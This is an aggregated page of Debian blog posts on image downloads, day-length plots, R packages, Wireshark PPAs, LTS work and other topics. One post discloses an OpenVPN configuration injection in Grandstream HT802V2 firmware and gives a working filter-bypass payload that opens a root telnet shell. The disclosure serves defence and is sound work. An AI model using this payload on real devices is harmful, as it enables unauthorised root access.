It's difficult to find the right Debian image. We have thousands of ISO files and cloud images and we support multiple CPU architectures and several download methods. The directory structure of our main image server is like a maze, and our web pages for downloading are also confusing.

Most important facts from this blog post

The Debian maze

Have you ever searched for a specific Debian image which was not the default netinst ISO for amd64? How long did it take to find it?

Debian is very good at hiding its images by offering a huge number of different versions and variants of images and multiple methods for downloading them. Debian also has multiple web pages for downloading them.

This is the secret Debian maze of images. It's currently filled with 8700+ different ISO images and another 34,000+ files (raw and qcow2) for the cloud images.

The main URL for the server hosting all Debian images is https://cdimage.debian.org/cdimage/

There, you will find installer images, live images, cloud images.

Let's try to find the right image you need

We have three different types of images:

  • Installer images can be booted on a computer without any OS; the Debian installer then performs a Debian installation
  • Live images boot a Debian desktop without installing anything to the local disks. You can give Debian a try, and if you like it you can use the Calamares graphical installer to install the same desktop onto the local disk.
  • Cloud images are meant for running a virtual machine with Debian using QEMU, KVM, OpenStack, or in the Amazon AWS or Microsoft Azure cloud (see the example below).
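
For example, here is a minimal sketch of booting one of the qcow2 cloud images locally with QEMU. The image file name is illustrative; pick the one matching your release and architecture, and whether you get a login console depends on the image variant:

qemu-system-x86_64 -m 2G -nographic \
    -drive file=debian-12-nocloud-amd64.qcow2,if=virtio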

Images for the stable release

Most likely, you are looking for an image to install the latest stable release. The URL https://cdimage.debian.org/cdimage/release/ shows:

12.9.0
12.9.0-live
current
current-live

but you cannot see that two of them are symlinks:

current -> 12.9.0/
current-live -> 12.9.0-live/

Here you will find the installer images and live images for the stable release (currently Debian 12, bookworm).

If you choose https://cdimage.debian.org/cdimage/release/12.9.0/ you will see a list of CPU architectures:

amd64
arm64
armel
armhf
i386
mips64el
mipsel
ppc64el
s390x
source
trace

(BTW, source and trace are not CPU architectures)

The typical end user will not care about most of these architectures, because almost every computer today needs images from the amd64 folder. You may have heard that your computer has a 64-bit CPU; even if it is an Intel processor, this architecture is called amd64.

Let's see what's in the folder amd64:

bt-bd
bt-cd
bt-dvd
iso-bd
iso-cd
iso-dvd
jigdo-16G
jigdo-bd
jigdo-cd
jigdo-dlbd
jigdo-dvd
list-16G
list-bd
list-cd
list-dlbd
list-dvd

Wow. This is confusing, and there is no description of what all those folders mean.

  • bt = BitTorrent, a peer-to-peer file sharing protocol
  • iso = directories containing ISO files
  • jigdo = a very special download option only for experts who know they really want this
  • list = contains lists of the names of the .deb files which are included on the images

The first three are different methods for downloading an image. Use iso when a single network connection will be fast enough for you. Using bt can result in a faster download, because it uses the BitTorrent peer-to-peer file sharing protocol; you need an additional torrent program for downloading (see the example below).
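
As an example of the bt method, a minimal sketch assuming a command-line client such as aria2 and an illustrative torrent file name:

aria2c debian-12.9.0-amd64-netinst.iso.torrent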

Then we have these variants:

  • bd = Blu-ray disc (size up to 8GB)
  • cd = CD image (size up to 700MB)
  • dvd = DVD image (size up to 4.7GB)
  • 16G = for a USB stick of 16GB or larger
  • dlbd = dual-layer Blu-ray disc

16G and dlbd images are only available via jigdo. All iso-xx and bt-xx folders provide the same images but with a different access method.
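
If you do want to try jigdo, a minimal sketch looks like this; the exact .jigdo URL is illustrative, so check the jigdo-dlbd folder for the real file name:

jigdo-lite https://cdimage.debian.org/cdimage/release/current/amd64/jigdo-dlbd/debian-12.9.0-amd64-DLBD-1.jigdo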

Here are examples of images:

  iso-cd/debian-12.9.0-amd64-netinst.iso
  iso-cd/debian-edu-12.9.0-amd64-netinst.iso
  iso-cd/debian-mac-12.9.0-amd64-netinst.iso

Fortunately, the folder explains in detail the differences between these images and what else you will find there. You can ignore the SHA... files if you do not know what they are needed for; they are not important for you (but see the verification sketch below). These ISO files are small and contain only the core Debian installer code and a small set of programs. If you install a desktop environment, the other packages will be downloaded at the end of the installation.
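
If you do want to verify a download, here is a minimal sketch; the checksum file name (SHA512SUMS) is an assumption, so check the folder listing for the exact name:

wget https://cdimage.debian.org/cdimage/release/current/amd64/iso-cd/debian-12.9.0-amd64-netinst.iso
wget https://cdimage.debian.org/cdimage/release/current/amd64/iso-cd/SHA512SUMS
sha512sum --check --ignore-missing SHA512SUMS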

The folders bt-dvd and iso-dvd only contain debian-12.9.0-amd64-DVD-1.iso or the appropriate torrent file. In bt-bd and iso-bd you will only find debian-edu-12.9.0-amd64-BD-1.iso. These large images contain many more Debian packages, so you will not need a network connection during the installation.

For the other CPU architectures (i.e. other than amd64), Debian provides fewer variants of images, but still a lot. In total, we have 44 ISO files (or torrents) for the current release of the Debian installer across all architectures. When using jigdo you can choose between 268 images.

And these are only the installer images for the stable release; no older or newer versions are counted here.

Take a breath before we dive into.....

The live images

The live images in release/12.9.0-live/amd64/iso-hybrid/ are only available for the amd64 architecture, but newer Debian releases will also have images for arm64.

We have eight different live images: seven contain one of the most common desktop environments, and one offers only a text interface (standard).

debian-live-12.9.0-amd64-xfce.iso
debian-live-12.9.0-amd64-mate.iso
debian-live-12.9.0-amd64-lxqt.iso
debian-live-12.9.0-amd64-gnome.iso
debian-live-12.9.0-amd64-lxde.iso
debian-live-12.9.0-amd64-standard.iso
debian-live-12.9.0-amd64-cinnamon.iso
debian-live-12.9.0-amd64-kde.iso

The folder name iso-hybrid refers to the technology that lets you burn those ISO files onto a CD/DVD/BD or write the same ISO file to a USB stick (see the sketch below). bt-hybrid will give you the torrent files for downloading the same images using a torrent client program.
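
For example, a minimal sketch of writing a live image to a USB stick; /dev/sdX is a placeholder for your stick's device, so double-check it with lsblk first, because the target is overwritten:

sudo dd if=debian-live-12.9.0-amd64-xfce.iso of=/dev/sdX bs=4M status=progress conv=fsync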

More recent installer and live images (aka testing)

For newer versions of the images we currently have these folders:

daily-builds
weekly-builds
weekly-live-builds
trixie_di_alpha1

I suggest using the weekly-builds, because in this folder you find a similar structure and all the variants of images as in the release directory. For example:

weekly-builds/amd64/iso-cd/debian-testing-amd64-netinst.iso

and similar for the live images

weekly-live-builds/amd64/iso-hybrid/debian-live-testing-amd64-kde.iso
weekly-live-builds/amd64/iso-hybrid/debian-live-testing-amd64-lxde.iso
weekly-live-builds/amd64/iso-hybrid/debian-live-testing-amd64-debian-junior.iso
weekly-live-builds/amd64/iso-hybrid/debian-live-testing-amd64-standard.iso
weekly-live-builds/amd64/iso-hybrid/debian-live-testing-amd64-lxqt.iso
weekly-live-builds/amd64/iso-hybrid/debian-live-testing-amd64-mate.iso
weekly-live-builds/amd64/iso-hybrid/debian-live-testing-amd64-xfce.iso
weekly-live-builds/amd64/iso-hybrid/debian-live-testing-amd64-gnome.iso
weekly-live-builds/amd64/iso-hybrid/debian-live-testing-amd64-cinnamon.iso
weekly-live-builds/arm64/iso-hybrid/debian-live-testing-arm64-gnome.iso

Here you see a new variant called debian-junior, which is a Debian blend. BitTorrent files are not available for weekly builds.

The daily-builds folder structure is different and only provides the small network install (netinst) ISOs, but in several versions from the last days. Currently we have 55 ISO files available there.

If you want to use the newest installation image, fetch this one:

https://cdimage.debian.org/cdimage/daily-builds/sid_d-i/arch-latest/amd64/iso-cd/debian-testing-amd64-netinst.iso

Debian stable with a backports kernel

Unfortunately, Debian does not provide any installation media that uses the stable release but includes a backports kernel for newer hardware. This is because our installer environment is a very complex mix of special tools (like anna) and special .udeb versions of packages.

But the FAIme web service of my FAI project can build a custom installation image using the backports kernel. Choose a desktop environment and a language, and add some package names if you like. Then select Debian 12 bookworm and enable the backports repository, including the newer kernel. After a short time you can download your own installation image.

Older releases

Usually you should not use older releases for a new installation. In our archive the folder https://cdimage.debian.org/cdimage/archive/ contains 6163 ISO files starting from Debian 3.0 (first release was in 2002) and including every point release.

The full DVD image for the oldstable release (Debian 11.11.0 including non-free firmware) is here

https://cdimage.debian.org/cdimage/unofficial/non-free/cd-including-firmware/archive/latest-oldstable/amd64/iso-dvd/firmware-11.11.0-amd64-DVD-1.iso

the smaller netinst image is

https://cdimage.debian.org/cdimage/archive/11.10.0/amd64/iso-cd/debian-11.10.0-amd64-netinst.iso

The oldest ISO I could find is from 1999, using kernel 2.0.36.

I still haven't managed to boot it in KVM.

UPDATE: I got a kernel panic because the VM had 4GB RAM. Reducing this to 500MB RAM (even 8MB works) started the installer of Debian 2.1 without any problems.

Anything else?

In this post, we still did not cover the ports folder (for the older hardware architectures which are not officially supported), which contains around 760 ISO files, nor the unofficial folder (1,445 ISO files), which in the past also provided the ISOs that included the non-free firmware blobs.

Then, there are more than 34,000 cloud images. But hey, no ISO files are involved there. This may become part of a completely new posting.

19 February, 2025 02:01PM

Dima Kogan

When are the days getting longer the fastest?

We're way past the winter solstice, and approaching the equinox. The sun is noticeably staying up later and later every day, which raises an obvious question: when are the days getting longer the fastest? Intuitively I want to say it should happen at the equinox. But does it happen exactly at the equinox? I could read up on all the gory details of this, or I could just make some plots. I wrote this:

#!/usr/bin/python3

import sys
import datetime
import astral.sun

lat  = 34.
year = 2025

city = astral.LocationInfo(latitude=lat, longitude=0)

date0 = datetime.datetime(year, 1, 1)

print("# date sunrise sunset length_min")

for i in range(365):
    date = date0 + datetime.timedelta(days=i)

    s = astral.sun.sun(city.observer, date=date)

    date_sunrise = s['sunrise']
    date_sunset  = s['sunset']

    date_string    = date.strftime('%Y-%m-%d')
    sunrise_string = date_sunrise.strftime('%H:%M')
    sunset_string  = date_sunset.strftime ('%H:%M')

    print(f"{date_string} {sunrise_string} {sunset_string} {(date_sunset-date_sunrise).total_seconds()/60}")

This computes the sunrise and sunset times for every day of 2025 at a latitude of 34 degrees (i.e. Los Angeles) and writes out a log file (using the vnlog format).

Let's plot it:

< sunrise-sunset.vnl                   \
  vnl-filter -p date,l='length_min/60' \
| feedgnuplot                          \
  --set 'format x "%b %d"'             \
  --domain                             \
  --timefmt '%Y-%m-%d'                 \
  --lines                              \
  --ylabel 'Day length (hours)'        \
  --hardcopy day-length.svg

[day-length.svg]

Well that makes sense. When are the days the longest/shortest?

$ < sunrise-sunset.vnl vnl-sort -grk length_min | head -n2 | vnl-align

#  date    sunrise sunset     length_min   
2025-06-21 04:49   19:14  864.8543702000001


$ < sunrise-sunset.vnl vnl-sort -gk length_min | head -n2 | vnl-align

#  date    sunrise sunset     length_min   
2025-12-21 07:01   16:54  592.8354265166668

Those are the solstices, as expected. Now let's look at the time gained/lost each day:

$ < sunrise-sunset.vnl                                  \
  vnl-filter -p date,d='diff(length_min)'               \
| vnl-filter --has d                                    \
| feedgnuplot                                           \
  --set 'format x "%b %d"'                              \
  --domain                                              \
  --timefmt '%Y-%m-%d'                                  \
  --lines                                               \
  --ylabel 'Daytime gained from the previous day (min)' \
  --hardcopy gain.svg

[gain.svg]

Looks vaguely sinusoidal, like the last plot. And it looks like we gain/lose at most ~2 minutes each day. When does the gain peak?

$ < sunrise-sunset.vnl vnl-filter -p date,d='diff(length_min)' | vnl-filter --has d | vnl-sort -grk d | head -n2 | vnl-align

#  date       d   
2025-03-19 2.13167


$ < sunrise-sunset.vnl vnl-filter -p date,d='diff(length_min)' | vnl-filter --has d | vnl-sort -gk d | head -n2 | vnl-align

#  date        d   
2025-09-25 -2.09886

Not at the equinoxes! The fastest gain is a few days before the equinox and the fastest loss a few days after.

19 February, 2025 02:47AM by Dima Kogan

February 18, 2025

hackergotchi for Dirk Eddelbuettel

Dirk Eddelbuettel

RcppDE 0.1.8 on CRAN: Maintenance

A maintenance release of our RcppDE package arrived at CRAN. RcppDE is a “port” of DEoptim, a package for derivative-free optimisation using differential evolution, from plain C to C++. By using RcppArmadillo the code became a lot shorter and more legible. Our other main contribution is to leverage some of the excellence we get for free from using Rcpp, in particular the ability to optimise user-supplied compiled objective functions which can make things a lot faster than repeatedly evaluating interpreted objective functions as DEoptim does (and which, in fairness, most other optimisers do too). The gains can be quite substantial.

This release is mostly maintenance. In the repo, we had turned off C++11 as the compilation standard fairly soon after the previous release two and a half years ago. But as CRAN is now more insistent about this, it drove this release (as it has a few recent ones). We also made a small internal change to allow compilation under ARMA_64BIT_WORD for larger vectors (which we cannot easily default to, as 32-bit integers are ingrained in R; see the sketch below). Other than that, just the usual updates to badges and continuous integration.
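
As a sketch of how a package might opt in (assuming the usual RcppArmadillo convention that the define must be set before the headers are included, and that src/Makevars does not already set PKG_CPPFLAGS):

echo 'PKG_CPPFLAGS = -DARMA_64BIT_WORD' >> src/Makevars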

Courtesy of my CRANberries, there is also a diffstat report. More detailed information is on the RcppDE page, or the repository.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. If you like this or other open-source work I do, you can sponsor me at GitHub.

18 February, 2025 11:27PM

hackergotchi for Steinar H. Gunderson

Steinar H. Gunderson

MySQL hypergraph optimizer talk

Norvald Ryeng, my old manager, gave a talk on the MySQL hypergraph optimizer (which was my main project before I left a couple of years ago) at a pre-FOSDEM event; it's pretty interesting if you want to know the basics of how an SQL join optimizer works.

The talk doesn't go very deep into the specifics of the hypergraph optimizer, but in a sense, that's the point; an optimizer isn't characterized by one unique trick that fixes everything, it's about having a solid foundation and then iterating on that a lot. Perhaps 80% of the talk could just as well have been about any other System R-derived optimizer, and that's really a feature in itself.

I remember that perhaps the most satisfying property during development was when things we hadn't even thought of integrated smoothly; say, when we added support for planning windowing functions and the planner just started pushing down the required sorts (i.e., interesting orders) almost by itself. (This is very unlike the old MySQL optimizer, where pretty much everything needed to think of everything else, or else risk stepping on each others' toes.)

Apart from that, I honestly don't know how far it is from being a reasonable default :-) I guess try it and see, if you're using MySQL?

18 February, 2025 10:14PM

hackergotchi for Bálint Réczey

Bálint Réczey

Wireshark on Ubuntu: Stay Ahead with the Latest Releases and Nightly Builds

Wireshark is an essential tool for network analysis, and staying up to date with the latest releases ensures access to new features, security updates, and bug fixes. While Ubuntu’s official repositories provide stable versions, they are often not the most recent.

Wearing both my Wireshark Core Developer and Debian/Ubuntu package maintainer hats, I'm happy to help the Wireshark team provide updated packages for all supported Ubuntu versions through dedicated PPAs. This post outlines how you can install the latest stable and nightly Wireshark builds on Ubuntu.

Latest Stable Releases

For users who want the most up-to-date stable Wireshark version, we maintain a PPA with backports of the latest releases:

🔗 Stable Wireshark PPA:
👉 https://launchpad.net/~wireshark-dev/+archive/ubuntu/stable

Installation Instructions

To install the latest stable Wireshark version, add the PPA and update your package list:

sudo add-apt-repository ppa:wireshark-dev/stable
sudo apt install wireshark

Nightly Builds (Development Versions)

For those who want to test new features before they are officially released, nightly builds are also available. These builds track the latest development code and you can watch them cooking on their Launchpad recipe page.

🔗 Nightly PPA:
👉 https://code.launchpad.net/~wireshark-dev/+archive/ubuntu/nightly

Installation Instructions

To install the latest development version of Wireshark, use the following commands:

sudo add-apt-repository ppa:wireshark-dev/nightly
sudo apt install wireshark

Note: Nightly builds may contain experimental features and are not guaranteed to be as stable as the official releases. Also, the nightly PPA targets only Ubuntu 24.04 and later, including the current development release.

If you need to revert to the stable version later, remove the nightly PPA and reinstall Wireshark:

sudo add-apt-repository --remove ppa:wireshark-dev/nightly
sudo apt install wireshark

Happy sniffing! 🙂

18 February, 2025 09:57AM by Réczey Bálint

February 14, 2025

hackergotchi for Freexian Collaborators

Freexian Collaborators

Monthly report about Debian Long Term Support, January 2025 (by Roberto C. Sánchez)

Like each month, have a look at the work funded by Freexian’s Debian LTS offering.

Debian LTS contributors

In January, 20 contributors were paid to work on Debian LTS; their reports are available:

  • Abhijith PA did 8.0h (out of 14.0h assigned), thus carrying over 6.0h to the next month.
  • Adrian Bunk did 36.5h (out of 47.75h assigned and 52.25h from previous period), thus carrying over 63.5h to the next month.
  • Andrej Shadura did 11.0h (out of 11.0h assigned and 4.0h from previous period), thus carrying over 4.0h to the next month.
  • Arturo Borrero Gonzalez did 9.0h (out of 10.0h assigned), thus carrying over 1.0h to the next month.
  • Bastien Roucariès did 22.0h (out of 22.0h assigned).
  • Ben Hutchings did 8.0h (out of 21.0h assigned and 3.0h from previous period), thus carrying over 16.0h to the next month.
  • Chris Lamb did 18.0h (out of 18.0h assigned).
  • Daniel Leidert did 20.0h (out of 23.0h assigned and 3.0h from previous period), thus carrying over 6.0h to the next month.
  • Emilio Pozuelo Monfort did 34.0h (out of 7.0h assigned and 27.75h from previous period), thus carrying over 0.75h to the next month.
  • Guilhem Moulin did 3.25h (out of 20.0h assigned), thus carrying over 16.75h to the next month.
  • Jochen Sprickerhof did 23.0h (out of 15.0h assigned and 8.0h from previous period).
  • Lee Garrett did 15.75h (out of 8.5h assigned and 51.5h from previous period), thus carrying over 44.25h to the next month.
  • Lucas Kanashiro did 8.0h (out of 32.0h assigned and 32.0h from previous period), thus carrying over 56.0h to the next month.
  • Markus Koschany did 40.0h (out of 40.0h assigned).
  • Roberto C. Sánchez did 14.75h (out of 13.5h assigned and 10.5h from previous period), thus carrying over 9.25h to the next month.
  • Santiago Ruano Rincón did 21.75h (out of 18.75h assigned and 6.25h from previous period), thus carrying over 3.25h to the next month.
  • Sean Whitton did 8.5h (out of 8.5h assigned).
  • Sylvain Beucler did 10.5h (out of 0.0h assigned and 49.5h from previous period), thus carrying over 39.0h to the next month.
  • Thorsten Alteholz did 11.0h (out of 11.0h assigned).
  • Tobias Frost did 12.0h (out of 12.0h assigned).

Evolution of the situation

In January, we released 33 DLAs.

There were numerous security and non-security updates to Debian 11 (codename “bullseye”) during January.

  • Notable security updates:
    • rsync, prepared by Thorsten Alteholz, fixed several CVEs (including information leak and path traversal vulnerabilities)
    • tomcat9, prepared by Markus Koschany, fixed several CVEs (including denial of service and information disclosure vulnerabilities)
    • ruby2.7, prepared by Bastien Roucariès, fixed several CVEs (including denial of service vulnerabilities)
    • tiff, prepared by Adrian Bunk, fixed several CVEs (including NULL ptr, buffer overflow, use-after-free, and segfault vulnerabilities)
  • Notable non-security updates:
    • linux-6.1, prepared by Ben Hutchings, has been packaged for bullseye (this was done specifically to provide a supported upgrade path for systems that currently use kernel packages from the “bullseye-backports” suite)
    • debian-security-support, prepared by Santiago Ruano Rincón, which formalized the EOL of intel-mediasdk and node-matrix-js-sdk

In addition to the security and non-security updates targeting “bullseye”, various LTS contributors have prepared uploads targeting Debian 12 (codename “bookworm”) with fixes for a variety of vulnerabilities. Abhijith PA prepared an upload of puma; Bastien Roucariès prepared an upload of node-postcss with fixes for data processing and denial of service vulnerabilities; Daniel Leidert prepared updates for setuptools, python-asyncssh, and python-tornado; Lee Garrett prepared an upload of ansible-core; and Guilhem Moulin prepared updates for python-urllib3, sqlparse, and opensc. Santiago Ruano Rincón also worked on tracking and filing some issues about packages that need an update in recent releases to avoid regressions on upgrade. This relates to CVEs that were fixed in buster or bullseye, but remain open in bookworm. These updates, along with Santiago’s work on identifying and tracking similar issues, underscore the LTS Team’s commitment to ensuring that the work we do as part of LTS also benefits the current Debian stable release.

LTS contributor Sean Whitton also prepared an upload of jinja2 and Santiago Ruano Rincón prepared an upload of openjpeg2 for Debian unstable (codename “sid”), as part of the LTS Team effort to assist with package uploads to unstable.

Thanks to our sponsors

Sponsors that joined recently are in bold.

14 February, 2025 12:00AM by Roberto C. Sánchez

February 13, 2025

hackergotchi for Jonathan Dowland

Jonathan Dowland

10 years at Red Hat

Red Hat Fedora company logo

I've just passed my 10th anniversary of starting at Red Hat! As a personal milestone, this is the longest I've stayed in a job: I managed 10 years at Newcastle University, although not in one continuous role.

I haven't exactly worked in one continuous role at Red Hat either, but it feels like what I do today is a logical evolution of what I started doing, whereas in Newcastle I jumped around a bit.

I've seen some changes: in my time here, we changed the logo from Shadow Man; we transitioned to using Google Workspace for lots of stuff, instead of in-house IT; we got bought by IBM; we changed President and CEO, twice. And millions of smaller things.

I won't reach an 11th: my Organisation in Red Hat is moving to IBM. I think this is sad news for Red Hat: they're losing some great people. But I'm optimistic for the future of my Organisation.

13 February, 2025 11:25AM

Russell Coker

Browser Choice

Browser Choice and Security Support

Google seems to be more into tracking web users and generally becoming hostile to users [1]. So using a browser other than Chrome seems like a good idea. The problem is the lack of browsers with security support. It seems that the only browser engines with the quality of security support we expect in Debian are Firefox and the Chrome engine. The Chrome engine is used in Chrome, Chromium, and Microsoft Edge. Edge of course isn’t an option and Chromium still has some of the Google anti-features built in.

Firefox

So I tried to use Firefox for the things I do. One feature of Chrome-based browsers that I really like is the ability to set a custom page for the new tab. This feature was removed because it was apparently being constantly attacked by malware [2]. There are addons to restore it, but I prefer to have a minimal number of addons and not have any that exist just to replace deliberately broken settings in the browser. Also, those addons can’t set a file for the URL; I could point one at a web server, but it’s annoying to have to set up a web server to work around a browser limitation.

Another thing that annoyed me was YouTube videos open in new tabs not starting to play when I change to the tab. There’s a Firefox setting for allowing web sites to autoplay but there doesn’t seem to be a way to add sites to the list.

Firefox is getting vertical tabs which is a really nice feature for wide displays [3].

Firefox has a Mozilla service for syncing passwords etc. It is possible to run your own server for this, but the server is written in Rust which is difficult to package and run [4]. There are Docker images for it but I prefer to avoid Docker, generally I think that Docker is a sign of failure in software development. If you can’t develop software that can be deployed without Docker then you aren’t developing it well.

Chromium

The Ungoogled Chromium project has a lot to offer for safer web browsing [5]. But the changes are invasive and it’s not included in Debian. Some of the changes like “replacing many Google web domains in the source code with non-existent alternatives ending in qjz9zk” are things that could be considered controversial. It definitely isn’t a candidate to replace the current Chromium package in Debian but might be a possibility to have as an extra browser.

What Next?

The Falkon browser that is part of the KDE project looks good, but QtWebEngine doesn’t have security support in Debian. Would it be possible to provide security support for it?

Ungoogled Chromium is available as a Flatpak, so I’ll test that out (see below). But ideally it would be packaged for Debian. I’ll try building a package of it and see how that goes.
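
A minimal sketch of trying it via Flatpak; the application ID below is an assumption, so search first to confirm the exact name:

flatpak search ungoogled
flatpak install flathub io.github.ungoogled_software.ungoogled_chromium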

The Iridium Browser is another option [6], it seems similar in design to Ungoogled-Chromium but by different people.

13 February, 2025 11:04AM by etbe

hackergotchi for Bits from Debian

Bits from Debian

DebConf25 Logo Contest Results

Last November, the DebConf25 Team asked the community to help design the logo for the 25th Debian Developers' Conference and the results are in! The logo contest received 23 submissions and we thank all the 295 people who took the time to participate in the survey. There were several amazing proposals, so choosing was not easy.

We are pleased to announce that the winner of the logo survey is 'Tower with red Debian Swirl originating from blue water' (option L), by Juliana Camargo and licensed CC BY-SA 4.0.

[DebConf25 Logo Contest Winner]

Juliana also shared with us a bit of her motivation, creative process and inspiration when designing her logo:

The idea for this logo came from the city's landscape, the place where the medieval tower looks over the river that meets the sea, almost like guarding it. The Debian red swirl comes out of the blue water splash as a continuous stroke, and they are also the French flag colours. I tried to combine elements from the city when I was sketching in the notebook, which is an important step for me as I feel that ideas flow much more easily, but the swirl + water with the tower was the most refreshing combination, so I jumped to the computer to design it properly. The water bit was the most difficult element, and I used the Debian swirl as a base for it, so both would look consistent. The city name font is a modern calligraphy style and the overall composition is not symmetric but balanced with the different elements. I am glad that the Debian community felt represented with this logo idea!

Congratulations, Juliana, and thank you very much for your contribution to Debian!

The DebConf25 Team would like to take this opportunity to remind you that DebConf, the annual international Debian Developers Conference, needs your help. If you want to help with the DebConf 25 organization, don't hesitate to reach out to us via the #debconf-team channel on OFTC.

Furthermore, we are always looking for sponsors. DebConf is run on a non-profit basis, and all financial contributions allow us to bring together a large number of contributors from all over the globe to work collectively on Debian. Detailed information about the sponsorship opportunities is available on the DebConf 25 website.

See you in Brest!

13 February, 2025 09:00AM by Donald Norwood, Santiago Ruano Rincón, Jean–Pierre Giraud

February 12, 2025

hackergotchi for Dirk Eddelbuettel

Dirk Eddelbuettel

RcppUUID 1.2.0 on CRAN: Adding Clock-based UUIDs

The RcppUUID package on CRAN has been providing UUIDs (based on the underlying Boost library) for several years. Written by Artem Klemsov and maintained in this gitlab repo, the package is a very nice example of clean and straightforward library binding. As it had dropped off CRAN over a relatively minor issue, I decided to adopt it with the previous 1.1.2 release made quite recently.

This release adds new high-resolution clock-based UUIDs according to the v7 spec. Internally, 100ns increments are represented. The resulting UUIDs are both unique and sortable. I added this recent example to the README.md which illustrates both the implicit ordering and the uniqueness. The unit tests check this with a much larger N.

> RcppUUID::uuid_generate_time(5)
[1] "0194d8fa-7add-735c-805b-6bbf22b78b9e" "0194d8fa-7add-735e-8012-3e0e53895b19"
[3] "0194d8fa-7add-735e-81af-bc67bb435ade" "0194d8fa-7add-735e-82b1-405bf57963ad"
[5] "0194d8fa-7add-735f-801e-efe57078b2e7"
>

While one can revert from the UUID object to the clock object, I am not aware of a text parser so there is currently no inverse function (as ulid offers) for the character representation.

The NEWS entry for the two releases follows.

Changes in version 1.2.0 (2025-02-12)

  • Time-based UUIDs, ie version 7, can now be generated (requiring Boost 1.86 or newer as in the current BH package)

Changes in version 1.1.2 (2025-01-31)

  • New maintainer to resurrect package on CRAN

Courtesy of my CRANberries, there is also a diffstat report. More detailed information is on the RcppUUID page, or the github repo.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. If you like this or other open-source work I do, you can sponsor me at GitHub.

12 February, 2025 08:55PM

hackergotchi for Evgeni Golov

Evgeni Golov

Authenticated RCE via OpenVPN Configuration File in Grandstream HT802V2 and probably others

I have a Grandstream HT802V2 running firmware 1.0.3.5, and while playing around with the VPN settings I realized that the sanitization of the "Additional Options" field done for CVE-2020-5739 is not sufficient.

Before the fix for CVE-2020-5739, /etc/rc.d/init.d/openvpn did

echo "$(nvram get 8460)" | sed 's/;/\n/g' >> ${CONF_FILE}

After the fix it does

echo "$(nvram get 8460)" | sed -e 's/;/\n/g' | sed -e '/script-security/d' -e '/^[ ]*down /d' -e '/^[ ]*up /d' -e '/^[ ]*learn-address /d' -e '/^[ ]*tls-verify /d' -e '/^[ ]*client-[dis]*connect /d' -e '/^[ ]*route-up/d' -e '/^[ ]*route-pre-down /d' -e '/^[ ]*auth-user-pass-verify /d' -e '/^[ ]*ipchange /d' >> ${CONF_FILE}

That means it deletes all lines that either contain script-security or start with a set of options that allow command execution.

Looking at the OpenVPN configuration template (/etc/openvpn/openvpn.conf), it already uses up and therefore sets script-security 2, so injecting that is unnecessary.

Thus if one can somehow inject "/bin/ash -c 'telnetd -l /bin/sh -p 1271'" in one of the command-executing options, a shell listening on port 1271 will be opened.

The filtering looks for lines that start with zero or more spaces, followed by the option name (up, down, etc.), followed by another space. While OpenVPN happily accepts tabs instead of spaces in the configuration file, I wasn't able to inject a tab either via the web interface or via SSH/gs_config. However, OpenVPN also allows quoting, which is only documented for parameters, but works just as well for option names.
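
To illustrate why the filter misses the quoted form, here is a quick check against the relevant sed expression (the payload path is just a placeholder); the unquoted line is deleted, while the quoted one passes through:

$ echo 'up /bin/evil' | sed -e '/^[ ]*up /d'
$ echo '"up" /bin/evil' | sed -e '/^[ ]*up /d'
"up" /bin/evil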

That means that instead of

up "/bin/ash -c 'telnetd -l /bin/sh -p 1271'"

from the original exploit by Tenable, we write

"up" "/bin/ash -c 'telnetd -l /bin/sh -p 1271'"

This is still a valid OpenVPN configuration statement, but the filtering in /etc/rc.d/init.d/openvpn won't catch it, and the resulting OpenVPN configuration will include the exploit:

# grep -E '(up|script-security)' /etc/openvpn.conf
up /etc/openvpn/openvpn.up
up-restart
;group nobody
script-security 2
"up" "/bin/ash -c 'telnetd -l /bin/sh -p 1271'"

And with that, once the OpenVPN connection is established, a root shell is reachable on port 1271:

/ # uname -a
Linux HT8XXV2 4.4.143 #108 SMP PREEMPT Mon May 13 18:12:49 CST 2024 armv7l GNU/Linux

/ # id
uid=0(root) gid=0(root)

Affected devices

  • HT802V2 running 1.0.3.5 (and any other release older than 1.0.3.10), as that's what I have tested
  • Most probably also other HT8xxV2, as they use the same firmware
  • Most probably also HT8xx(V1), as their /etc/rc.d/init.d/openvpn looks very similar, according to firmware dumps

Fix

After I disclosed this issue to Grandstream, they issued a new firmware release (1.0.3.10) which modifies the filtering to the following:

echo "$(nvram get 8460)" | sed -e 's/;/\n/g' \
                         | sed -e '/script-security/d' \
                               -e '/^["'\'' \f\v\r\n\t]*down["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*up["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*learn-address["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*tls-verify["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*tls-crypt-v2-verify["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*client-[dis]*connect["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*route-up["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*route-pre-down["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*auth-user-pass-verify["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*ipchange["'\'' \f\v\r\n\t]/d' >> ${CONF_FILE}

So far I have been unable to inject any further commands past this filter.

Timeline

12 February, 2025 04:58PM by evgeni

hackergotchi for Jonathan Dowland

Jonathan Dowland

February 11, 2025

Ian Jackson

derive-deftly 1.0.0 - Rust derive macros, the easy way

derive-deftly 1.0 is released.

derive-deftly is a template-based derive-macro facility for Rust. It has been a great success. Your codebase may benefit from it too!

Rust programmers will appreciate its power, flexibility, and consistency, compared to macro_rules; and its convenience and simplicity, compared to proc macros.

Programmers coming to Rust from scripting languages will appreciate derive-deftly’s convenient automatic code generation, which works as a kind of compile-time introspection.
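
Getting started is a one-liner; a minimal sketch, assuming a Cargo version recent enough to provide the add subcommand:

cargo add derive-deftly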

Rust’s two main macro systems

I’m often a fan of metaprogramming, including macros. They can help remove duplication and flab, which are often the enemy of correctness.

Rust has two macro systems. derive-deftly offers much of the power of the more advanced (proc_macros), while beating the simpler one (macro_rules) at its own game for ease of use.

(Side note: Rust has at least three other ways to do metaprogramming: generics; build.rs; and, multiple module inclusion via #[path=]. These are beyond the scope of this blog post.)

macro_rules!

macro_rules! aka “pattern macros”, “declarative macros”, or sometimes “macros by example” are the simpler kind of Rust macro.

